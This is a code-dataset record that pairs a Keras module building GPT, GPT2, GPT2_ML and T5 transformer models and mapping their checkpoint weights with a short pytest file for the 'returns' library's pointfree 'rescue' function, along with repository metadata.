x = self.apply(
inputs=[x, s], layer=Add, name='Embedding-Token-Segment'
)
x = self.apply(
inputs=self.simplify([x, p]),
layer=PositionEmbedding,
input_dim=self.max_position,
output_dim=self.embedding_size,
merge_mode='add',
hierarchical=self.hierarchical_position,
embeddings_initializer=self.initializer,
custom_position_ids=self.custom_position_ids,
name='Embedding-Position'
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='Embedding-Dropout'
)
if self.embedding_size != self.hidden_size:
x = self.apply(
inputs=x,
layer=Dense,
units=self.hidden_size,
kernel_initializer=self.initializer,
name='Embedding-Mapping'
)
return x
def apply_final_layers(self, inputs):
"""剩余部分
"""
x = inputs
        # Language Model part
x = self.apply(
inputs=x,
layer=Embedding,
arguments={'mode': 'dense'},
name='Embedding-Token'
)
x = self.apply(
inputs=x,
layer=Activation,
activation=self.final_activation,
name='LM-Activation'
)
return x
def load_variable(self, checkpoint, name):
"""加载单个变量的函数
"""
variable = super(GPT, self).load_variable(checkpoint, name)
if name == 'gpt/embeddings/word_embeddings':
return self.load_embeddings(variable)
else:
return variable
def variable_mapping(self):
"""映射到TF版GPT权重格式
"""
mapping = super(GPT, self).variable_mapping()
mapping = {
k: [
i.replace('bert/', 'gpt/').replace('encoder', 'transformer')
for i in v
]
for k, v in mapping.items()
}
return mapping
class GPT2(GPT):
"""构建GPT2模型
链接: https://github.com/openai/gpt-2
"""
def get_inputs(self):
"""GPT2的输入是token_ids
"""
x_in = self.apply(
layer=Input, shape=(self.sequence_length,), name='Input-Token'
)
return x_in
def apply_embeddings(self, inputs):
"""GPT2的embedding是token、position两者embedding之和
"""
x = inputs
x = self.apply(
inputs=x,
layer=Embedding,
input_dim=self.vocab_size,
output_dim=self.embedding_size,
embeddings_initializer=self.initializer,
mask_zero=True,
name='Embedding-Token'
)
x = self.apply(
inputs=x,
layer=PositionEmbedding,
input_dim=self.max_position,
output_dim=self.embedding_size,
merge_mode='add',
hierarchical=self.hierarchical_position,
embeddings_initializer=self.initializer,
name='Embedding-Position'
)
if self.embedding_size != self.hidden_size:
x = self.apply(
inputs=x,
layer=Dense,
units=self.hidden_size,
kernel_initializer=self.initializer,
name='Embedding-Mapping'
)
return x
def apply_main_layers(self, inputs, index):
"""GPT2的主体是基于Self-Attention的模块
顺序:LN --> Att --> Add --> LN --> FFN --> Add
"""
x = inputs
z = self.layer_norm_conds[0]
attention_name = 'Transformer-%d-MultiHeadSelfAttention' % index
feed_forward_name = 'Transformer-%d-FeedForward' % index
attention_mask = self.compute_attention_bias(index)
# Self Attention
xi = x
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
epsilon=1e-5,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm' % attention_name
)
x = self.apply(
inputs=[x, x, x, attention_mask],
layer=MultiHeadAttention,
arguments={'a_bias': True},
heads=self.num_attention_heads,
head_size=self.attention_head_size,
out_dim=self.hidden_size,
key_size=self.attention_key_size,
kernel_initializer=self.initializer,
name=attention_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % attention_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % attention_name
)
# Feed Forward
xi = x
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
epsilon=1e-5,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm' % feed_forward_name
)
x = self.apply(
inputs=x,
layer=FeedForward,
units=self.intermediate_size,
activation=self.hidden_act,
kernel_initializer=self.initializer,
name=feed_forward_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % feed_forward_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % feed_forward_name
)
return x
def apply_final_layers(self, inputs):
"""剩余部分
"""
x = inputs
z = self.layer_norm_conds[0]
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
epsilon=1e-5,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='Output-Norm'
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='Output-Dropout'
)
x = super(GPT2, self).apply_final_layers(x)
return x
def variable_mapping(self):
"""映射到TF版GPT2权重格式
"""
mapping = super(GPT2, self).variable_mapping()
mapping = {
k: [i.replace('output/LayerNorm', 'input/LayerNorm') for i in v]
for k, v in mapping.items()
}
mapping['Output-Norm'] = [
'gpt/output/LayerNorm/beta',
'gpt/output/LayerNorm/gamma',
]
return mapping
class GPT2_ML(GPT):
"""构建GPT2_ML模型
链接: https://github.com/imcaspar/gpt2-ml
注意:GPT2_ML虽然号称GPT2,但是它的结构其实更接近GPT,它自称GPT2的
原因大概是因为它开源的版本参数量达到了GPT2的15亿参数。
"""
def get_inputs(self):
"""GPT2_ML的输入是token_ids
"""
x_in = self.apply(
layer=Input, shape=(self.sequence_length,), name='Input-Token'
)
return x_in
def apply_embeddings(self, inputs):
"""GPT2_ML的embedding是token、position两者embedding之和
"""
x = inputs
z = self.layer_norm_conds[0]
x = self.apply(
inputs=x,
layer=Embedding,
input_dim=self.vocab_size,
output_dim=self.embedding_size,
embeddings_initializer=self.initializer,
mask_zero=True,
name='Embedding-Token'
)
x = self.apply(
inputs=x,
layer=PositionEmbedding,
input_dim=self.max_position,
output_dim=self.embedding_size,
merge_mode='add',
hierarchical=self.hierarchical_position,
embeddings_initializer=self.initializer,
name='Embedding-Position'
)
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
epsilon=1e-5,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='Embedding-Norm'
)
if self.embedding_size != self.hidden_size:
x = self.apply(
inputs=x,
layer=Dense,
units=self.hidden_size,
kernel_initializer=self.initializer,
name='Embedding-Mapping'
)
return x
def apply_main_layers(self, inputs, index):
"""GPT2_ML的主体是基于Self-Attention的模块
顺序:Att --> LN --> FFN --> Add --> LN
"""
x = inputs
z = self.layer_norm_conds[0]
attention_name = 'Transformer-%d-MultiHeadSelfAttention' % index
feed_forward_name = 'Transformer-%d-FeedForward' % index
attention_mask = self.compute_attention_bias(index)
# Self Attention
xi, x, arguments = x, [x, x, x, attention_mask], {'a_bias': True}
x = self.apply(
inputs=x,
layer=MultiHeadAttention,
arguments=arguments,
heads=self.num_attention_heads,
head_size=self.attention_head_size,
out_dim=self.hidden_size,
key_size=self.attention_key_size,
kernel_initializer=self.initializer,
name=attention_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % attention_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % attention_name
)
# Feed Forward
xi = x
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
epsilon=1e-5,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm-0' % feed_forward_name
)
x = self.apply(
inputs=x,
layer=FeedForward,
units=self.intermediate_size,
activation=self.hidden_act,
kernel_initializer=self.initializer,
name=feed_forward_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % feed_forward_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % feed_forward_name
)
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
epsilon=1e-5,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm-1' % feed_forward_name
)
return x
def load_variable(self, checkpoint, name):
"""加载单个变量的函数
"""
variable = super(GPT2_ML, self).load_variable(checkpoint, name)
if name == 'newslm/embeddings/word_embed':
return self.load_embeddings(variable)
else:
return variable
def variable_mapping(self):
"""映射到官方GPT2_ML权重格式
"""
mapping = {
'Embedding-Token': ['newslm/embeddings/word_embed'],
'Embedding-Position': ['newslm/embeddings/pos_embed'],
'Embedding-Norm': [
'newslm/embeddings/LayerNorm_embed_norm/beta',
'newslm/embeddings/LayerNorm_embed_norm/gamma',
],
}
for i in range(self.num_hidden_layers):
prefix = 'newslm/layer%02d/' % i
mapping.update({
'Transformer-%d-MultiHeadSelfAttention' % i: [
prefix + 'query_layer/kernel',
prefix + 'query_layer/bias',
prefix + 'key_layer/kernel',
prefix + 'key_layer/bias',
prefix + 'value_layer/kernel',
prefix + 'value_layer/bias',
prefix + 'context_projection_layer/kernel',
prefix + 'context_projection_layer/bias',
],
'Transformer-%d-FeedForward-Norm-0' % i: [
prefix + 'LayerNorm_mlp_ln0/beta',
prefix + 'LayerNorm_mlp_ln0/gamma',
],
'Transformer-%d-FeedForward' % i: [
prefix + 'intermediate/kernel',
prefix + 'intermediate/bias',
prefix + 'output/kernel',
prefix + 'output/bias',
],
'Transformer-%d-FeedForward-Norm-1' % i: [
prefix + 'LayerNorm_mlp_ln1/beta',
prefix + 'LayerNorm_mlp_ln1/gamma',
],
})
return mapping
class T5_Base(Transformer):
"""Google的T5模型(基类)
注意T5有两个版本,一开始放出来的版本称为t5.1.0,而后来放出了一个升级
版本称为t5.1.1,两者结构略有不同,包括后来放出来的多国语言版T5也采用
了t5.1.1的结构。
t5.1.0: https://github.com/google-research/text-to-text-transfer-transformer
t5.1.1: https://github.com/google-research/text-to-text-transfer-transformer/blob/master/released_checkpoints.md#t511
multilingual-t5: https://github.com/google-research/multilingual-t5
"""
@insert_arguments(version='t5.1.0')
def __init__(self, **kwargs):
super(T5_Base, self).__init__(**kwargs)
def load_variable(self, checkpoint, name):
"""加载单个变量的函数
"""
variable = super(T5_Base, self).load_variable(checkpoint, name)
if name == 'shared/embedding':
return self.load_embeddings(variable)
elif name == 'decoder/logits/kernel':
return self.load_embeddings(variable.T).T
elif 'relative_attention_bias' in name:
return variable.T
else:
return variable
def create_variable(self, name, value, dtype=None):
"""在tensorflow中创建一个变量
"""
if 'relative_attention_bias' in name:
value = value.T
return super(T5_Base, self).create_variable(name, value, dtype)
def variable_mapping(self):
"""映射到官方T5权重格式
"""
mapping = {
'Embedding-Token': ['shared/embedding'],
'Encoder-Embedding-Relative-Position': [
'encoder/block_000/layer_000/SelfAttention/relative_attention_bias'
],
'Encoder-Output-Norm': ['encoder/final_layer_norm/scale'],
'Decoder-Embedding-Relative-Position': [
'decoder/block_000/layer_000/SelfAttention/relative_attention_bias',
],
'Decoder-Output-Norm': ['decoder/final_layer_norm/scale'],
}
for i in range(self.num_hidden_layers):
# Encoder trunk
prefix = 'encoder/block_%03d/' % i
mapping.update({
'Encoder-Transformer-%d-MultiHeadSelfAttention' % i: [
prefix + 'layer_000/SelfAttention/q',
prefix + 'layer_000/SelfAttention/k',
prefix + 'layer_000/SelfAttention/v',
prefix + 'layer_000/SelfAttention/o',
],
'Encoder-Transformer-%d-MultiHeadSelfAttention-Norm' % i: [
prefix + 'layer_000/layer_norm/scale',
],
'Encoder-Transformer-%d-FeedForward' % i: [
prefix + 'layer_001/DenseReluDense/wi/kernel',
prefix + 'layer_001/DenseReluDense/wo/kernel',
],
'Encoder-Transformer-%d-FeedForward-Norm' % i: [
prefix + 'layer_001/layer_norm/scale',
],
})
# Decoder trunk
prefix = 'decoder/block_%03d/' % i
mapping.update({
'Decoder-Transformer-%d-MultiHeadSelfAttention' % i: [
prefix + 'layer_000/SelfAttention/q',
prefix + 'layer_000/SelfAttention/k',
prefix + 'layer_000/SelfAttention/v',
prefix + 'layer_000/SelfAttention/o',
],
'Decoder-Transformer-%d-MultiHeadSelfAttention-Norm' % i: [
prefix + 'layer_000/layer_norm/scale',
],
'Decoder-Transformer-%d-MultiHeadCrossAttention' % i: [
prefix + 'layer_001/EncDecAttention/q',
prefix + 'layer_001/EncDecAttention/k',
prefix + 'layer_001/EncDecAttention/v',
prefix + 'layer_001/EncDecAttention/o',
],
'Decoder-Transformer-%d-MultiHeadCrossAttention-Norm' % i: [
prefix + 'layer_001/layer_norm/scale',
],
'Decoder-Transformer-%d-FeedForward' % i: [
prefix + 'layer_002/DenseReluDense/wi/kernel',
prefix + 'layer_002/DenseReluDense/wo/kernel',
],
'Decoder-Transformer-%d-FeedForward-Norm' % i: [
prefix + 'layer_002/layer_norm/scale',
],
})
if self.version == 't5.1.1':
mapping['Encoder-Output-Norm'] = ['encoder/rms_norm/scale']
mapping['Decoder-Output-Norm'] = ['decoder/rms_norm/scale']
mapping['Decoder-Output-LM'] = ['decoder/logits/kernel']
mapping = {
k: [i.replace('layer_norm', 'rms_norm') for i in v]
for k, v in mapping.items()
}
for i in range(self.num_hidden_layers):
for layer in [
'Encoder-Transformer-%d-FeedForward' % i,
'Decoder-Transformer-%d-FeedForward' % i
]:
mapping[layer] = [
mapping[layer][0][:-7] + '_0' + mapping[layer][0][-7:],
mapping[layer][0][:-7] + '_1' + mapping[layer][0][-7:],
mapping[layer][1]
]
return mapping
class T5_Encoder(T5_Base):
"""Google的T5模型(Encoder)
"""
def get_inputs(self):
"""T5的Encoder的输入只有token_ids
"""
x_in = self.apply(
layer=Input,
shape=(self.sequence_length,),
name='Encoder-Input-Token'
)
return x_in
def apply_embeddings(self, inputs):
"""T5的embedding只有token embedding,
并把relative position embedding准备好,待attention使用。
"""
x = inputs
x = self.apply(
inputs=x,
layer=Embedding,
input_dim=self.vocab_size,
output_dim=self.embedding_size,
embeddings_initializer=self.initializer,
mask_zero=True,
name='Embedding-Token'
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='Encoder-Embedding-Dropout'
)
if self.embedding_size != self.hidden_size:
x = self.apply(
inputs=x,
layer=Dense,
units=self.hidden_size,
kernel_initializer=self.initializer,
name='Encoder-Embedding-Mapping'
)
return x
def apply_main_layers(self, inputs, index):
"""T5的Encoder的主体是基于Self-Attention的模块
顺序:LN --> Att --> Add --> LN --> FFN --> Add
"""
x = inputs
z = self.layer_norm_conds[0]
attention_name = 'Encoder-Transformer-%d-MultiHeadSelfAttention' % index
feed_forward_name = 'Encoder-Transformer-%d-FeedForward' % index
attention_mask = self.compute_attention_bias(index)
position_bias = self.compute_position_bias(x)
# Self Attention
xi = x
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
center=False,
epsilon=1e-6,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm' % attention_name
)
x = self.apply(
inputs=[x, x, x, position_bias],
layer=MultiHeadAttention,
arguments={'p_bias': 't5_relative'},
heads=self.num_attention_heads,
head_size=self.attention_head_size,
out_dim=self.hidden_size,
key_size=self.attention_key_size,
use_bias=False,
attention_scale=False,
kernel_initializer=self.initializer,
name=attention_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % attention_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % attention_name
)
# Feed Forward
xi = x
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
center=False,
epsilon=1e-6,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm' % feed_forward_name
)
x = self.apply(
inputs=x,
layer=FeedForward,
units=self.intermediate_size,
activation=self.hidden_act,
use_bias=False,
kernel_initializer=self.initializer,
name=feed_forward_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % feed_forward_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % feed_forward_name
)
return x
def apply_final_layers(self, inputs):
"""剩余部分
"""
x = inputs
z = self.layer_norm_conds[0]
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
center=False,
epsilon=1e-6,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='Encoder-Output-Norm'
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='Encoder-Output-Dropout'
)
return x
def compute_position_bias(self, inputs=None):
"""T5相对位置编码
"""
if self.position_bias is None:
x = inputs
p = self.apply(
inputs=[x, x],
layer=RelativePositionEmbeddingT5,
input_dim=32,
output_dim=self.num_attention_heads,
bidirectional=True,
embeddings_initializer=self.initializer,
name='Encoder-Embedding-Relative-Position'
)
self.position_bias = p
return self.position_bias
class T5_Decoder(LM_Mask, T5_Base):
"""Google的T5模型(Decoder)
"""
def __init__(self, with_lm=True, **kwargs):
super(T5_Decoder, self).__init__(**kwargs)
self.with_lm = with_lm
def get_inputs(self):
"""T5的Decoder的输入为context序列和token_ids
"""
c_in = self.apply(
layer=Input,
shape=(self.sequence_length, self.hidden_size),
name='Input-Context'
)
x_in = self.apply(
layer=Input,
shape=(self.sequence_length,),
name='Decoder-Input-Token'
)
return [c_in, x_in]
def apply_embeddings(self, inputs):
"""T5的embedding只有token embedding,
并把relative position embedding准备好,待attention使用。
"""
c, x = inputs
c = self.apply(
inputs=c, layer=Masking, mask_value=0.0, name='Masked-Context'
)
x = self.apply(
inputs=x,
layer=Embedding,
input_dim=self.vocab_size,
output_dim=self.embedding_size,
embeddings_initializer=self.initializer,
mask_zero=True,
name='Embedding-Token'
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='Decoder-Embedding-Dropout'
)
if self.embedding_size != self.hidden_size:
x = self.apply(
inputs=x,
layer=Dense,
units=self.hidden_size,
kernel_initializer=self.initializer,
name='Decoder-Embedding-Mapping'
)
return [c, x]
def apply_main_layers(self, inputs, index):
"""T5的Dencoder主体是基于Self-Attention、Cross-Attention的模块
顺序:LN --> Att1 --> Add --> LN --> Att2 --> Add --> LN --> FFN --> Add
"""
c, x = inputs
z = self.layer_norm_conds[0]
self_attention_name = 'Decoder-Transformer-%d-MultiHeadSelfAttention' % index
cross_attention_name = 'Decoder-Transformer-%d-MultiHeadCrossAttention' % index
feed_forward_name = 'Decoder-Transformer-%d-FeedForward' % index
attention_mask = self.compute_attention_bias(index)
position_bias = self.compute_position_bias([x, c])
# Self Attention
xi = x
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
center=False,
epsilon=1e-6,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm' % self_attention_name
)
x = self.apply(
inputs=[x, x, x, attention_mask, position_bias[0]],
layer=MultiHeadAttention,
arguments={
'a_bias': True,
'p_bias': 't5_relative'
},
heads=self.num_attention_heads,
head_size=self.attention_head_size,
out_dim=self.hidden_size,
key_size=self.attention_key_size,
use_bias=False,
attention_scale=False,
kernel_initializer=self.initializer,
name=self_attention_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % self_attention_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % self_attention_name
)
# Cross Attention
xi = x
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
center=False,
epsilon=1e-6,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm' % cross_attention_name
)
x = self.apply(
inputs=[x, c, c, position_bias[1]],
layer=MultiHeadAttention,
arguments={
'a_bias': None,
'p_bias': 't5_relative'
},
heads=self.num_attention_heads,
head_size=self.attention_head_size,
out_dim=self.hidden_size,
key_size=self.attention_key_size,
use_bias=False,
attention_scale=False,
kernel_initializer=self.initializer,
name=cross_attention_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % cross_attention_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % cross_attention_name
)
# Feed Forward
xi = x
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
center=False,
epsilon=1e-6,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm' % feed_forward_name
)
x = self.apply(
inputs=x,
layer=FeedForward,
units=self.intermediate_size,
activation=self.hidden_act,
use_bias=False,
kernel_initializer=self.initializer,
name=feed_forward_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % feed_forward_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % feed_forward_name
)
return [c, x]
def apply_final_layers(self, inputs):
"""剩余部分
"""
c, x = inputs
z = self.layer_norm_conds[0]
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
center=False,
epsilon=1e-6,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='Decoder-Output-Norm'
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='Decoder-Output-Dropout'
)
x = self.apply(
inputs=x,
layer=Lambda,
function=lambda x: x / self.hidden_size**0.5,
mask=lambda i, m: m,
name='Decoder-Output-Scale'
)
if self.with_lm:
# Token-probability prediction head
if self.embedding_size != self.hidden_size:
x = self.apply(
inputs=x,
layer=Dense,
units=self.embedding_size,
kernel_initializer=self.initializer,
name='Decoder-Output-Mapping'
)
lm_activation = 'softmax' if self.with_lm is True else self.with_lm
if self.version == 't5.1.0':
x = self.apply(
inputs=x,
layer=Embedding,
arguments={'mode': 'dense'},
name='Embedding-Token'
)
x = self.apply(
inputs=x,
layer=Activation,
activation=lm_activation,
name='Decoder-Output-LM-Activation'
)
else:
x = self.apply(
inputs=x,
layer=Dense,
units=self.vocab_size,
activation=lm_activation,
use_bias=False,
kernel_initializer=self.initializer,
name='Decoder-Output-LM'
)
return x
def compute_attention_bias(self, inputs=None):
"""修改LM Mask的序列长度(从 self.inputs[0] 改为 self.inputs[1] )
"""
old_inputs = self.inputs[:]
self.inputs = [old_inputs[1]]
mask = super(T5_Decoder, self).compute_attention_bias(inputs)
self.inputs = old_inputs
return mask
def compute_position_bias(self, inputs=None):
"""T5相对位置编码
"""
if self.position_bias is None:
x, c = inputs
p1 = self.apply(
inputs=[x, x],
layer=RelativePositionEmbeddingT5,
input_dim=32,
output_dim=self.num_attention_heads,
bidirectional=False,
embeddings_initializer=self.initializer,
name='Decoder-Embedding-Relative-Position'
)
p2 = self.apply(
inputs=[x, c],
layer=RelativePositionEmbeddingT5,
input_dim=32,
output_dim=self.num_attention_heads,
bidirectional=False,
embeddings_initializer=self.initializer,
name='Decoder-Embedding-Relative-Position'
)
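# Note: p1 and p2 deliberately share a layer name, so self.apply reuses a
# single RelativePositionEmbeddingT5 layer for both the self-attention and
# cross-attention position biases (the same caching that reuses 'Embedding-Token').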
self.position_bias = (p1, p2)
return self.position_bias
class T5(T5_Base):
"""Google的T5模型(Encoder-Decoder)
"""
def __init__(self, **kwargs):
super(T5, self).__init__(**kwargs)
kwargs['layers'] = self.layers
e_name, d_name = 'Encoder', 'Decoder'
if 'name' in kwargs:
e_name = '%s_%s' % (kwargs['name'], e_name)
d_name = '%s_%s' % (kwargs['name'], d_name)
del kwargs['name']  # avoid passing the name argument twice
self._encoder = T5_Encoder(name=e_name, **kwargs)
self._decoder = T5_Decoder(name=d_name, **kwargs)
def build(self, **kwargs):
"""同时构建Encoder和Decoder
"""
self._encoder.build(**kwargs)
self._decoder.build(**kwargs)
self.encoder = self._encoder.model
self.decoder = self._decoder.model
self.inputs = self.encoder.inputs + self.decoder.inputs[1:]
self.outputs = self.decoder(
self.encoder.outputs + self.decoder.inputs[1:]
)
self.model = Model(self.inputs, self.outputs)
def extend_with_language_model(BaseModel):
"""添加下三角的Attention Mask(语言模型用)
"""
class LanguageModel(LM_Mask, BaseModel):
"""带下三角Attention Mask的派生模型
"""
def __init__(self, *args, **kwargs):
super(LanguageModel, self).__init__(*args, **kwargs)
self.with_mlm = self.with_mlm or True
return LanguageModel
def extend_with_unified_language_model(BaseModel):
"""添加UniLM的Attention Mask(Seq2Seq模型用)
"""
class UnifiedLanguageModel(UniLM_Mask, BaseModel):
"""带UniLM的Attention Mask的派生模型
UniLM: https://arxiv.org/abs/1905.03197
"""
def __init__(self, *args, **kwargs):
super(UnifiedLanguageModel, self).__init__(*args, **kwargs)
self.with_mlm = self.with_mlm or True
return UnifiedLanguageModel
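# Usage sketch for the two wrappers above (hypothetical file paths, shown for
# illustration only; build_transformer_model below is the real entry point):
#
#   model = build_transformer_model(
#       config_path='bert_config.json',
#       checkpoint_path='bert_model.ckpt',
#       model='bert',
#       application='unilm',  # applies extend_with_unified_language_model
#   )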
def build_transformer_model(
config_path=None,
checkpoint_path=None,
model='bert',
application='encoder',
return_keras_model=True,
**kwargs
):
"""根据配置文件构建模型,可选加载checkpoint权重
"""
configs = {}
if config_path is not None:
configs.update(json.load(open(config_path)))
configs.update(kwargs)
if 'max_position' not in configs:
configs['max_position'] = configs.get('max_position_embeddings', 512)
if 'dropout_rate' not in configs:
configs['dropout_rate'] = configs.get('hidden_dropout_prob')
if 'segment_vocab_size' not in configs:
configs['segment_vocab_size'] = configs.get('type_vocab_size', 2)
models = {
'bert': BERT,
'albert': ALBERT,
'albert_unshared': ALBERT_Unshared,
'roberta': BERT,
'nezha': NEZHA,
'roformer': RoFormer,
'electra': ELECTRA,
'gpt': GPT,
'gpt2': GPT2,
'gpt2_ml': GPT2_ML,
't5': T5,
't5_encoder': T5_Encoder,
't5_decoder': T5_Decoder,
't5.1.0': T5,
't5.1.0_encoder': T5_Encoder,
't5.1.0_decoder': T5_Decoder,
't5.1.1': T5,
't5.1.1_encoder': T5_Encoder,
't5.1.1_decoder': T5_Decoder,
}
if is_string(model):
model = model.lower()
MODEL = models[model]
if model.startswith('t5.1.1'):
configs['version'] = 't5.1.1'
else:
MODEL = model
application = application.lower()
if application in ['lm', 'unilm'] and model in ['electra', 't5']:
raise ValueError(
'"%s" model can not be used as "%s" application.\n' %
(model, application)
)
if application == 'lm':
MODEL = extend_with_language_model(MODEL)
elif application == 'unilm':
MODEL = extend_with_unified_language_model(MODEL)
transformer = MODEL(**configs)
transformer.build(**configs)
if checkpoint_path is not None:
transformer.load_weights_from_checkpoint(checkpoint_path)
if return_keras_model:
return transformer.model
else:
return transformer | [
"[email protected]"
] | |
cfdeb79292f967bfebee770e954dab908b791940 | 48db7bebad4309a7bca8b7dec2cc9193551f46a3 | /tests/test_pointfree/test_rescue.py | 3d49b3090ae848d51b47324261c89d0e5254c292 | [
"BSD-2-Clause"
] | permissive | kenjihiraoka/returns | bff6196a059d411b6c36f4a2e284e4439d24fd73 | 4589973520d7226b18acd7295d1a9a10ff032759 | refs/heads/master | 2022-11-20T13:20:41.094871 | 2020-07-07T08:23:05 | 2020-07-07T08:23:05 | 277,863,697 | 0 | 0 | BSD-2-Clause | 2020-07-07T16:09:25 | 2020-07-07T16:09:25 | null | UTF-8 | Python | false | false | 2,504 | py | from returns.context import RequiresContextIOResult, RequiresContextResult
from returns.io import IOFailure, IOResult, IOSuccess
from returns.pointfree import rescue
from returns.result import Failure, Result, Success
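# `rescue` lifts a failure handler over a container: the handler runs only on
# Failure values, while Success values pass through unchanged, as the
# assertions below verify.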
def _result_function(argument: int) -> Result[int, str]:
if argument > 0:
return Success(argument + 1)
return Failure('nope')
def _ioresult_function(argument: int) -> IOResult[int, str]:
if argument > 0:
return IOSuccess(argument + 1)
return IOFailure('nope')
def _context_result_function(
argument: int,
) -> RequiresContextResult[int, int, str]:
if argument > 0:
return RequiresContextResult(lambda deps: Success(argument + deps))
return RequiresContextResult.from_failure('nope')
def _context_ioresult_function(
argument: int,
) -> RequiresContextIOResult[int, int, str]:
if argument > 0:
return RequiresContextIOResult(lambda deps: IOSuccess(argument + deps))
return RequiresContextIOResult.from_failure('nope')
def test_rescue_with_ioresult():
"""Ensures that functions can be composed and return type is correct."""
rescued = rescue(_ioresult_function)
assert rescued(IOSuccess(1)) == IOSuccess(1)
assert rescued(IOFailure(1)) == IOSuccess(2)
assert rescued(IOFailure(0)) == IOFailure('nope')
def test_rescue_with_result():
"""Ensures that functions can be composed and return type is correct."""
rescued = rescue(_result_function)
assert rescued(Success(1)) == Success(1)
assert rescued(Failure(1)) == Success(2)
assert rescued(Failure(0)) == Failure('nope')
def test_rescue_with_context_result():
"""Ensures that functions can be composed and return type is correct."""
rescued = rescue(_context_result_function)
assert rescued(
RequiresContextResult.from_value(1),
)(1) == Success(1)
assert rescued(
RequiresContextResult.from_failure(1),
)(1) == Success(2)
assert rescued(
RequiresContextResult.from_failure(0),
)(1) == Failure('nope')
def test_rescue_with_context_ioresult():
"""Ensures that functions can be composed and return type is correct."""
rescued = rescue(_context_ioresult_function)
assert rescued(
RequiresContextIOResult.from_value(1),
)(1) == IOSuccess(1)
assert rescued(
RequiresContextIOResult.from_failure(1),
)(1) == IOSuccess(2)
assert rescued(
RequiresContextIOResult.from_failure(0),
)(1) == IOFailure('nope')
| [
"[email protected]"
] | |
